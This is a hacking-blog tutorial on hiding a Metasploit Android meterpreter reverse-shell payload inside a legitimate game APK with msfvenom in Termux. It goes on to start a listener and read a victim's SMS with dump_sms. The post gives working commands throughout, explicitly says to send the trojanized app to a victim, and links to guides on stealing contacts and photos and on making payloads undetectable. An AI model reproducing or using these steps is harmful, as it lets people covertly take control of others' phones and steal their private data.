How To Bind Metasploit Payload Easy Method | Xploit Poison

.How To Inject Metasploit Payload In Apk; Bind Malware


Binding Malware In original Apk, We say that it is a social engineering method to hack someone. Nowaday there are many premium application mod available on internet for free, and it's called crack premium apk version. let's understand why it's available for free? Hackers are using binding method to hack people and due to this method people are getting hacked by regularly according cyber security researcher reports. because hackers bind malware in Premium Application and upload and website to download it. after download hackers can access and control phone, so we should not use mod version. 

Let's Bind Metasploit Payload In Apk


We Will Bind Metasploit Payload in Apk using termux, but you can use same proccess in kali linux to bind payload. I hope you have installed metasploit in termux and you know how to create payload by metasploit in termux. 

Requirements

Installing Requirements 

 pkg install apktool - cupy and paste in termux 




 pkg install apksigner  - Cupy and paste in termux to install it




Then  You Need An Apk i am using Flappybird. I will bind payload in flappybird game. So you can use any application. so download original apk and move in termux $HOME.


Download Flappy Bird - Available In Telegram Group




f

 msfvenom -x flappy-bird-1-3.apk -p android/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 R> Bindmy1st.apk



msfvenom -x (enter original apk name here) -p android/meterpreter/reverse_tcp LHOST=(Enter IP Address) LPORT=(Enter Port) R>(payload output name) these command will bind payload in apk so wait for it.  f

Now We Have Successful Binded Payload Without Any Error.



 Install and Check First. - Please First Check it's working properly or not then send it to victim




Now Start TCP HANDLER 

Type msfconsole and start metasploit-framework and Follow These Commands to Start handler.

  • $- set payload android/meterpreter/reverse_tcp 
  • $- set LHOST 127.0.0.1
  • $- set LPORT 4444
  • exploit

c




Now wait for connection, when victim will install you will get meterpreter reverse connection.

 help - help command will show all metasploit command to access data from phone.




a

dump_sms - will access sms list from target device



How To Access Call Logs, contacts list, photos, videos, etc.. Click Here 


How To Make FUD Metasploit Payload 


Post a Comment

0 Comments